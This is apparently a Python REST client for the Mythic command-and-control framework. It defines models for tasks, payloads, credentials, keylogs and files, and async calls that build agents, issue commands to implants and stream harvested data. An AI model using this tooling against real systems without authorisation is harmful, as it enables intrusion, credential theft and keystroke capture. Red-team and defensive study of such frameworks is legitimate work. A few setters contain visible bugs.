self._pcallback - - @pcallback.setter - def pcallback(self, pcallback): - if isinstance(pcallback, Callback) or pcallback is None: - self._pcallback = pcallback - elif pcallback == "null": - self._pcallback = None - else: - self._pcallback = Callback(id=pcallback) - - @property - def registered_payload(self) -> "Payload": - return self._registered_payload - - @registered_payload.setter - def registered_payload(self, registered_payload): - if isinstance(registered_payload, Payload) or registered_payload is None: - self._registered_payload = registered_payload - else: - self._registered_payload = Payload(uuid=registered_payload) - - @property - def payload_type(self) -> PayloadType: - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - - @property - def c2_profile(self) -> C2Profile: - return self._c2_profile - - @c2_profile.setter - def c2_profile(self, c2_profile): - if isinstance(c2_profile, C2Profile) or c2_profile is None: - self._c2_profile = c2_profile - else: - self._c2_profile = C2Profile(name=c2_profile) - - @property - def payload_description(self) -> str: - return self._payload_description - - 
@payload_description.setter - def payload_description(self, payload_description): - self._payload_description = payload_description - - @property - def integrity_level(self) -> int: - return self._integrity_level - - @integrity_level.setter - def integrity_level(self, integrity_level): - self._integrity_level = integrity_level - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def encryption_type(self) -> str: - return self._encryption_type - - @encryption_type.setter - def encryption_type(self, encryption_type): - self._encryption_type = encryption_type - - @property - def decryption_key(self) -> str: - return self._decryption_key - - @decryption_key.setter - def decryption_key(self, decryption_key): - self._decryption_key = decryption_key - - @property - def encryption_key(self) -> str: - return self._encryption_key - - @encryption_key.setter - def encryption_key(self, encryption_key): - self._encryption_key = encryption_key - - @property - def tasks(self) -> List["Task"]: - return self._tasks - - @tasks.setter - def tasks(self, tasks): - if isinstance(tasks, List): - self._tasks = [Task(**x) if isinstance(x, Dict) else x for x in tasks] - elif tasks is None: - self._tasks = tasks - else: - self._tasks = [Task(**tasks) if isinstance(tasks, Dict) else tasks] - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def supported_profiles(self) -> List[C2Profile]: - return self._supported_profiles - - @supported_profiles.setter - def supported_profiles(self, supported_profiles): - if supported_profiles is None: - self._supported_profiles = supported_profiles - else: - self._supported_profiles = [x if isinstance(x, C2Profile) else C2Profile(**x) for x in supported_profiles] - - -class TaskFile: - def __init__(self, content: Union[bytes, str], filename: str, param_name: str): - self._filename = filename - if isinstance(content, bytes): - self._content = content - else: - self._content = base64.b64decode(content) - self._param_name = param_name - - @property - def filename(self): - return self._filename - - @filename.setter - def filename(self, filename): - self._filename = filename - - @property - def param_name(self): - return self._param_name - - @param_name.setter - def param_name(self, param_name): - self._param_name = param_name - - @property - def content(self): - return self._content - - @content.setter - def content(self, content): - if isinstance(content, bytes): - self._content = content - else: - self._content = base64.b64decode(content) - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - -class Task: - def __init__( - self, - command: Union[Command, str] = None, - agent_task_id: str = None, - command_id: str = None, - params: str = None, - files: List[TaskFile] = None, - timestamp: str = None, - callback: Union[Callback, int, Dict] = None, - operator: Union[Operator, str] = None, - status: str = None, - task_status: str = None, # sometimes this is set to not conflict with overall status message - original_params: str = None, - comment: str = None, 
- comment_operator: Union[Operator, str] = None, - completed: bool = None, - id: int = None, - status_timestamp_preprocessing: str = None, - status_timestamp_processed: str = None, - status_timestamp_submitted: str = None, - status_timestamp_processing: str = None, - operation: str = None, - responses: List[Union["Response", Dict]] = None, - ): - if isinstance(command, Command) or command is None: - self._command = command - else: - self._command = Command(cmd=command) - self.params = params - self.timestamp = timestamp - self.agent_task_id = agent_task_id - self.command_id = command_id - self.status_timestamp_preprocessing = status_timestamp_preprocessing - self.status_timestamp_processed = status_timestamp_processed - self.status_timestamp_submitted = status_timestamp_submitted - self.status_timestamp_processing = status_timestamp_processing - self.operation = operation - self.completed = completed - if isinstance(callback, Callback) or callback is None: - self._callback = callback - elif isinstance(callback, Dict): - self._callback = Callback(**callback) - else: - self._callback = Callback(id=callback) - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - self.status = status - self._original_params = original_params - if comment == "": - self._comment = None - else: - self._comment = comment - if isinstance(comment_operator, Operator) or comment_operator is None: - self._comment_operator = comment_operator - elif comment_operator == "null": - self._comment_operator = None - else: - self._comment_operator = Operator(username=comment_operator) - self._id = id - if isinstance(responses, List): - self._responses = [ - Response(**x) if isinstance(x, Dict) else x for x in responses - ] - elif responses is None: - self._responses = responses - else: - self._responses = [ - Response(**responses) - if isinstance(responses, Dict) - else Response(response=responses) - ] - if self._status is None: - self._status = task_status - if isinstance(files, List): - self._files = files - elif isinstance(files, TaskFile): - self._files = [files] - elif files is None: - self._files = None - else: - raise Exception("Invalid value for files parameter") - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Task): - return self._id == other.id - return False - - @property - def command(self) -> Command: - return self._command - - @command.setter - def command(self, command): - if isinstance(command, Command) or command is None: - self._command = command - else: - self._command = Command(cmd=command) - - @property - def params(self) -> str: - return self._params - - @params.setter - def params(self, params): - if params is None: - self._params = "" - else: - self._params = params - - @property - def files(self) -> List[TaskFile]: - return self._files - - @files.setter - def files(self, files): - if isinstance(files, List): - self._files = files - elif isinstance(files, TaskFile): - self._files = [files] - elif files is None: - self._files = None - else: - raise Exception("Invalid value for files parameter") - - @property - def timestamp(self) -> str: - return self._timestamp - - @timestamp.setter - def 
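The Task constructor above coerces plain values into the richer model objects: a string command becomes a Command, an integer callback becomes a Callback, a username string becomes an Operator, and to_json() exposes each populated field without its underscore prefix. A short sketch with placeholder values, module name assumed as before:

# Illustrative sketch; all ids and names are placeholders.
from mythic_rest import Task

t = Task(command="shell", params="whoami", callback=12, operator="alice", status="submitted")
print(t.command.cmd)          # "shell"  - wrapped in a Command
print(t.callback.id)          # 12       - wrapped in a Callback
print(t.operator.username)    # "alice"  - wrapped in an Operator
print(t.to_json()["params"])  # "whoami" - underscore-prefixed attributes exposed without the prefix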
timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def callback(self) -> Callback: - return self._callback - - @callback.setter - def callback(self, callback): - if isinstance(callback, Callback): - self._callback = callback - else: - self._callback = Callback(id=callback) - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def status(self) -> str: - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def original_params(self) -> str: - return self._original_params - - @original_params.setter - def original_params(self, original_params): - self._original_params = original_params - - @property - def comment(self) -> str: - return self._comment - - @comment.setter - def comment(self, comment): - if comment == "": - self._comment = None - else: - self._comment = comment - - @property - def comment_operator(self) -> Operator: - return self._comment_operator - - @comment_operator.setter - def comment_operator(self, comment_operator): - if isinstance(comment_operator, Operator) or comment_operator is None: - self._comment_operator = comment_operator - elif comment_operator == "null": - self._comment_operator = None - else: - self._comment_operator = Operator(username=comment_operator) - - @property - def responses(self) -> List["Response"]: - return self._responses - - @responses.setter - def responses(self, responses): - if isinstance(responses, List): - self._responses = [ - Response(**x) if isinstance(x, Dict) else x for x in responses - ] - elif responses is None: - self._responses = responses - else: - self._responses = [ - Response(**responses) - if isinstance(responses, Dict) - else Response(response=responses) - ] - - @property - def id(self): - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def task_status(self) -> str: - return self._status - - @task_status.setter - def task_status(self, task_status): - self._status = task_status - - @property - def completed(self) -> bool: - return self._completed - - @completed.setter - def completed(self, completed): - self._completed = completed - - -class Payload: - def __init__( - self, - uuid: str = None, - tag: str = None, - operator: Union[Operator, str] = None, - creation_time: str = None, - payload_type: Union[PayloadType, str] = None, - pcallback: Union["Callback", int] = None, - c2_profiles: Dict[ - Union[C2Profile, str, Dict], List[Union[C2ProfileParameters, Dict]] - ] = None, - operation: Union[Operation, str] = None, - wrapped_payload: Union["Payload", str] = None, - deleted: bool = None, - build_container: str = None, - build_phase: str = None, - build_message: str = None, - callback_alert: bool = None, - auto_generated: bool = None, - task: Union[Task, Dict] = None, - file_id: Union["FileMeta", Dict] = None, - id: int = None, - build_parameters: List[Dict] = None, - commands: List = None, - filename: str = None, - ): - self._uuid = uuid - self._tag = tag - self._build_container = build_container - self._callback_alert = callback_alert - self._auto_generated = auto_generated - self._build_parameters = build_parameters - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - self._creation_time = creation_time - if 
isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - if isinstance(pcallback, Callback) or pcallback is None: - self._pcallback = pcallback - else: - self._pcallback = Callback(id=pcallback) - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(**task) - if isinstance(file_id, FileMeta) or file_id is None: - self._file_id = file_id - else: - self._file_id = FileMeta(**file_id) - if isinstance(wrapped_payload, Payload) or wrapped_payload is None: - self._wrapped_payload = wrapped_payload - else: - self._wrapped_payload = Payload(uuid=wrapped_payload) - self._deleted = deleted - self._build_phase = build_phase - self._build_message = build_message - self._id = id - if isinstance(commands, List) and len(commands) > 0: - if isinstance(commands[0], Command): - self._commands = commands - elif isinstance(commands[0], Dict): - self._commands = [Command(**x) for x in commands] - else: - self._commands = [Command(cmd=x) for x in commands] - else: - self._commands = None - if isinstance(c2_profiles, Dict): - self._c2_profiles = {} - for k, v in c2_profiles.items(): - key = ( - k["name"] - if isinstance(k, Dict) - else k.name - if isinstance(k, C2Profile) - else k - ) - self._c2_profiles[key] = [] - for i in v: - # now iterate over each list of parameters for the profile - if isinstance(i, C2ProfileParameters): - self._c2_profiles[key].append(i) - elif isinstance(i, Dict): - self._c2_profiles[key].append(C2ProfileParameters(**i)) - else: - self._c2_profiles = None - self._filename = filename - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Payload): - return self._uuid == other.uuid - return False - - @property - def uuid(self) -> str: - return self._uuid - - @uuid.setter - def uuid(self, uuid): - self._uuid = uuid - - @property - def tag(self) -> str: - return self._tag - - @tag.setter - def tag(self, tag): - self._tag = tag - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def creation_time(self) -> str: - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def payload_type(self) -> PayloadType: - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - - @property - def pcallback(self) -> "Callback": - return self._pcallback - - @pcallback.setter - def pcallback(self, pcallback): - if isinstance(pcallback, Callback) or pcallback is None: - self._pcallback = pcallback - else: - self._pcallback = Callback(id=pcallback) - - @property - def c2_profiles(self) -> 
Dict: - return self._c2_profiles - - @c2_profiles.setter - def c2_profiles(self, c2_profiles): - if isinstance(c2_profiles, Dict): - self._c2_profiles = {} - for k, v in c2_profiles.items(): - key = ( - k["name"] - if isinstance(k, Dict) - else k.name - if isinstance(k, C2Profile) - else k - ) - self._c2_profiles[key] = [] - for i in v: - # now iterate over each list of parameters for the profile - if isinstance(i, C2ProfileParameters): - self._c2_profiles[key].append(i) - elif isinstance(i, Dict): - self._c2_profiles[key].append(C2ProfileParameters(**i)) - else: - self._c2_profiles = None - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def wrapped_payload(self) -> "Payload": - return self._wrapped_payload - - @wrapped_payload.setter - def wrapped_payload(self, wrapped_payload): - if isinstance(wrapped_payload, Payload) or wrapped_payload is None: - self._wrapped_payload = wrapped_payload - else: - self._wrapped_payload = Payload(uuid=wrapped_payload) - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def build_phase(self) -> str: - return self._build_phase - - @build_phase.setter - def build_phase(self, build_phase): - self._build_phase = build_phase - - @property - def build_message(self) -> str: - return self._build_message - - @build_message.setter - def build_message(self, build_message): - self._build_message = build_message - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def build_container(self) -> str: - return self._build_container - - @build_container.setter - def build_container(self, build_container): - self._build_container = build_container - - @property - def commands(self) -> List[Command]: - return self._commands - - @commands.setter - def commands(self, commands): - if isinstance(commands, List): - self._commands = [ - Command(**x) if isinstance(x, Dict) else x for x in commands - ] - else: - self._commands = None - - @property - def build_parameters(self) -> List[Dict]: - return self._build_parameters - - @build_parameters.setter - def build_parameters(self, build_parameters): - self._build_parameters = build_parameters - - @property - def file_id(self) -> "FileMeta": - return self._file_id - - @file_id.setter - def file_id(self, file_id): - if isinstance(file_id, FileMeta) or file_id is None: - self._file_id = file_id - else: - self._file_id = FileMeta(**file_id) - - @property - def filename(self) -> str: - return self._filename - - @filename.setter - def filename(self, filename): - self._filename = filename - - -class FileMeta: - def __init__( - self, - agent_file_id: str = None, - total_chunks: int = None, - chunks_received: int = None, - chunk_size: int = None, - task: Union[Task, Dict] = None, - complete: bool = None, - path: str = None, - full_remote_path: str = None, - host: str = None, - is_payload: bool = None, - is_screenshot: bool = None, - is_download_from_agent: bool = None, - file_browser: Dict = None, - filename: str = None, - delete_after_fetch: bool = None, - operation: Union[Operation, str] = None, - timestamp: str = None, - deleted: bool = None, - operator: Union[Operator, str] = None, - md5: str = None, - sha1: str = None, - id: int = None,
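Payload applies the same coercion pattern to its c2_profiles argument: the dict is re-keyed by profile name and each parameter dict is expanded into a C2ProfileParameters object, which is what lets create_payload() below read i.name / i.value. A sketch, where the module name and the C2ProfileParameters keyword arguments are assumptions:

# Illustrative sketch; C2ProfileParameters(name=..., value=...) is assumed from how
# create_payload() consumes these objects.
from mythic_rest import Payload, C2ProfileParameters

p = Payload(
    payload_type="poseidon",
    tag="demo build",
    filename="poseidon.bin",
    c2_profiles={"HTTP": [
        {"name": "callback_host", "value": "https://domain.com"},
        {"name": "callback_port", "value": "80"},
    ]},
)
print(p.payload_type.ptype)  # "poseidon" - coerced into a PayloadType
assert all(isinstance(x, C2ProfileParameters) for x in p.c2_profiles["HTTP"])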
- cmd: str = None, - comment: str = None, - upload: dict = None, - params: dict = None, - ): - self._agent_file_id = agent_file_id - self._total_chunks = total_chunks - self._chunks_received = chunks_received - self._chunk_size = chunk_size - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=task) - self._complete = complete - self._path = path - self._full_remote_path = full_remote_path - self._host = host - self._is_payload = is_payload - self._is_screenshot = is_screenshot - self._is_download_from_agent = is_download_from_agent - self._file_browser = file_browser - self._filename = filename - self._delete_after_fetch = delete_after_fetch - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - self._timestamp = timestamp - self._deleted = deleted - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - self._md5 = md5 - self._sha1 = sha1 - self._id = id - self._cmd = cmd - self._comment = comment - self._upload = upload - self._params = params - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, FileMeta): - return self._id == other.id - return False - - @property - def agent_file_id(self): - return self._agent_file_id - - @agent_file_id.setter - def total_chunks(self, agent_file_id): - self._agent_file_id = agent_file_id - - @property - def total_chunks(self): - return self._total_chunks - - @total_chunks.setter - def total_chunks(self, total_chunks): - self._total_chunks = total_chunks - - @property - def chunks_received(self): - return self._chunks_received - - @chunks_received.setter - def chunks_received(self, chunks_received): - self._chunks_received = chunks_received - - @property - def chunk_size(self): - return self._chunk_size - - @chunk_size.setter - def chunk_size(self, chunk_size): - self._chunk_size = chunk_size - - @property - def task(self): - return self._task - - @task.setter - def task(self, task): - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=task) - - @property - def complete(self): - return self._complete - - @complete.setter - def complete(self, complete): - self._complete = complete - - @property - def path(self): - return self._path - - @path.setter - def path(self, path): - self._path = path - - @property - def full_remote_path(self): - return self._full_remote_path - - @full_remote_path.setter - def full_remote_path(self, full_remote_path): - self._full_remote_path = full_remote_path - - @property - def host(self): - return self._host - - @host.setter - def host(self, host): - self._host = host - - @property - def is_payload(self): - return self._is_payload - - @is_payload.setter - def is_payload(self, is_payload): - self._is_payload = is_payload - - @property - def is_screenshot(self): - return self._is_screenshot - - @is_screenshot.setter - def is_screenshot(self, is_screenshot): - self._is_screenshot = is_screenshot - - @property - def is_download_from_agent(self): - return self._is_download_from_agent - - @is_download_from_agent.setter - def is_download_from_agent(self, 
is_download_from_agent): - self._is_download_from_agent = is_download_from_agent - - @property - def file_browser(self): - return self._file_browser - - @file_browser.setter - def file_browser(self, file_browser): - self._file_browser = file_browser - - @property - def filename(self): - return self._filename - - @filename.setter - def filename(self, filename): - self._filename = filename - - @property - def delete_after_fetch(self): - return self._delete_after_fetch - - @delete_after_fetch.setter - def delete_after_fetch(self, delete_after_fetch): - self._delete_after_fetch = delete_after_fetch - - @property - def operation(self): - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def timestamp(self): - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def deleted(self): - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def operator(self): - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def md5(self): - return self._md5 - - @md5.setter - def md5(self, md5): - self._md5 = md5 - - @property - def sha1(self): - return self._sha1 - - @sha1.setter - def sha1(self, sha1): - self._sha1 = sha1 - - @property - def id(self): - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def cmd(self): - return self._cmd - - @cmd.setter - def cmd(self, cmd): - self._cmd = cmd - - @property - def comment(self): - return self._comment - - @comment.setter - def comment(self, comment): - self._comment = comment - - @property - def upload(self): - return self._upload - - @upload.setter - def upload(self, upload): - self._upload = upload - - @property - def params(self): - return self._params - - @params.setter - def params(self, params): - self._params = params - - -class Response: - def __init__( - self, - response: str = None, - timestamp: str = None, - task: Union[Task, int, Dict] = None, # JSON string of the corresponding task - id: int = None, - ): - self._response = response - self._timestamp = timestamp - if isinstance(task, Task) or task is None: - self._task = task - elif isinstance(task, Dict): - self._task = Task(**task) - else: - self._task = Task(id=task) - self._id = id - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Response): - return self._id == other.id - return False - - @property - def response(self) -> str: - return self._response - - @response.setter - def response(self, response): - self._response = response - - @property - def timestamp(self) -> str: - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def task(self) -> Task: - return self._task - - @task.setter - def task(self, task): - if isinstance(task, Task) or task is None: - self._task = task - 
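Response follows the same pattern for its task argument: an existing Task passes through, a dict is expanded with Task(**dict), and anything else is treated as a task id. A short sketch, module name assumed as before:

# Illustrative sketch; the id is a placeholder.
from mythic_rest import Response

r1 = Response(response="uid=0(root)", task=42)           # bare value becomes Task(id=42)
r2 = Response(response="uid=0(root)", task={"id": 42})   # dict becomes Task(**{"id": 42})
assert r1.task.id == r2.task.id == 42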
elif isinstance(task, Dict): - self._task = Task(**task) - else: - self._task = Task(id=task) - - @property - def id(self): - return self._id - - @id.setter - def id(self, id): - self._id = id - - -class Credential: - def __init__( - self, - type: str = None, - task: Union[Task, int] = None, - task_command: Union[Command, str] = None, - account: str = None, - realm: str = None, - id: int = None, - operator: Union[Operator, str] = None, - operation: Union[Operation, str] = None, - timestamp: str = None, - credential: bytes = None, - comment: str = None, - deleted: bool = None, - new: bool = None, - ): - self._type = type - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=task) - if isinstance(task_command, Command) or task_command is None: - self._task_command = task_command - else: - self._task_command = Command(cmd=task_command) - self._account = account - self._realm = realm - self._id = id - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - self._timestamp = timestamp - self._credential = credential - self._comment = comment - self._deleted = deleted - self._new = new - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Credential): - return self._id == other.id - return False - - @property - def type(self) -> str: - return self._type - - @type.setter - def type(self, type): - self._type = type - - @property - def task(self) -> Task: - return self._task - - @task.setter - def task(self, task): - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=task) - - @property - def task_command(self) -> Command: - return self._task_command - - @task_command.setter - def task_command(self, task_command): - if isinstance(task_command, Command) or task_command is None: - self._task_command = task_command - else: - self._task_command = Command(cmd=task_command) - - @property - def account(self) -> str: - return self._account - - @account.setter - def account(self, account): - self._account = account - - @property - def realm(self) -> str: - return self._realm - - @realm.setter - def realm(self, realm): - self._realm = realm - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def timestamp(self) -> str: - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def credential(self) -> bytes: - 
return self._credential - - @credential.setter - def credential(self, credential): - self._credential = credential - - @property - def comment(self) -> str: - return self._comment - - @comment.setter - def comment(self, comment): - self._comment = comment - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def new(self) -> bool: - return self._new - - @new.setter - def new(self, new): - self._new = new - - -class Keylog: - def __init__( - self, - task: Union[Task, int] = None, - keystrokes: bytes = None, - window: str = None, - timestamp: str = None, - operation: Union[Operation, str] = None, - user: str = None, - host: str = None, - id: int = None, - callback: Union[Callback, Dict] = None, - ): - self._keystrokes = keystrokes - self._window = window - self._timestamp = timestamp - self._user = user - self._host = host - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=int) - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - if isinstance(callback, Callback) or callback is None: - self._callback = callback - else: - self._callback = Callback(**callback) - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Keylog): - return self._id == other.id - - @property - def keystrokes(self) -> bytes: - return self._keystrokes - - @keystrokes.setter - def keystrokes(self, keystrokes): - self._keystrokes = keystrokes - - @property - def window(self) -> str: - return self._window - - @window.setter - def window(self, window): - self._window = window - - @property - def timestamp(self) -> str: - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def user(self) -> str: - return self._user - - @user.setter - def user(self, user): - self._user = user - - @property - def host(self) -> str: - return self._host - - @host.setter - def host(self, host): - self._host = host - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def task(self) -> Task: - return self._task - - @task.setter - def task(self, task): - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=int) - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def callback(self) -> Callback: - return self._callback - - @callback.setter - def callback(self, callback): - if isinstance(callback, Callback) or callback is None: - self._callback = callback - else: - self._callback = Callback(**callback) - - -class DisabledCommandsProfile: - def __init__( - self, - payload_types: List[Union[PayloadType, str, Dict]] = None, - name: str = None, - ): - self._name = name - if isinstance(payload_types, List): - self._payload_types = [ - PayloadType(ptype=x) - if isinstance(x, str) - else 
PayloadType(**x) - if isinstance(x, Dict) - else x - for x in payload_types - ] - else: - self._payload_types = payload_types - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, DisabledCommandsProfile): - return self._name == other.name - - @property - def name(self) -> str: - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def payload_types(self) -> List[PayloadType]: - return self._payload_types - - @payload_types.setter - def payload_types(self, payload_types): - if isinstance(payload_types, List): - self._payload_types = [ - PayloadType(ptype=x) - if isinstance(x, str) - else PayloadType(**x) - if isinstance(x, Dict) - else x - for x in payload_types - ] - else: - self._payload_types = payload_types - - -class EventMessage: - def __init__( - self, - operator: Union[Operator, str] = None, - timestamp: str = None, - message: str = None, - operation: Union[Operation, str] = None, - level: str = None, - deleted: bool = None, - resolved: bool = None, - id: int = None, - channel: str = None, - alerts: List[Dict] = None, - ): - self._timestamp = timestamp - self._message = message - self._level = level - self._deleted = deleted - self._resolved = resolved - self._id = id - self._channel = channel - self._alerts = alerts - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, EventMessage): - return self._id == other.id - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def timestamp(self) -> str: - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def message(self) -> str: - return self._message - - @message.setter - def message(self, message): - self._message = message - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def level(self) -> str: - return self._level - - @level.setter - def level(self, level): - self._level = level - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def resolved(self) -> bool: - return self._resolved - - @resolved.setter - def resolved(self, resolved): 
- self._resolved = resolved - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def channel(self) -> str: - return self._channel - - @channel.setter - def channel(self, channel): - self._channel = channel - - @property - def alerts(self) -> List[Dict]: - return self._alerts - - @alerts.setter - def alerts(self, alerts): - self._alerts = alerts - - -class MythicResponse: - def __init__( - self, - response=None, - raw_response: Dict[str, str] = None, - response_code: int = None, - status: str = None, - ): - # set the response_code and raw_response automatically - self.response_code = response_code - self.raw_response = raw_response - # determine and set status if it's not explicitly specified - if status is None and "status" in raw_response: - self.status = raw_response["status"] - elif status is None and self.response_code != 200: - self.status = "error" - else: - self.status = status - # if the raw_response has a status indicator, remove it and set the response - # otherwise just set response to raw_response and process later - if "status" in raw_response and response is None: - del raw_response["status"] - self.response = raw_response - elif response is None: - self.response = raw_response - - def to_json(self): - r = {} - for k in vars(self): - try: - r[k] = getattr(self, k) - except: - r[k] = json.dumps(getattr(self, k)) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - @property - def response(self): - return self.__response - - @property - def status(self): - return self.__status - - @property - def response_code(self): - return self.__response_code - - @property - def raw_response(self): - return self.__raw_response - - @response.setter - def response(self, response): - self.__response = response - - @response_code.setter - def response_code(self, response_code): - self.__response_code = response_code - - 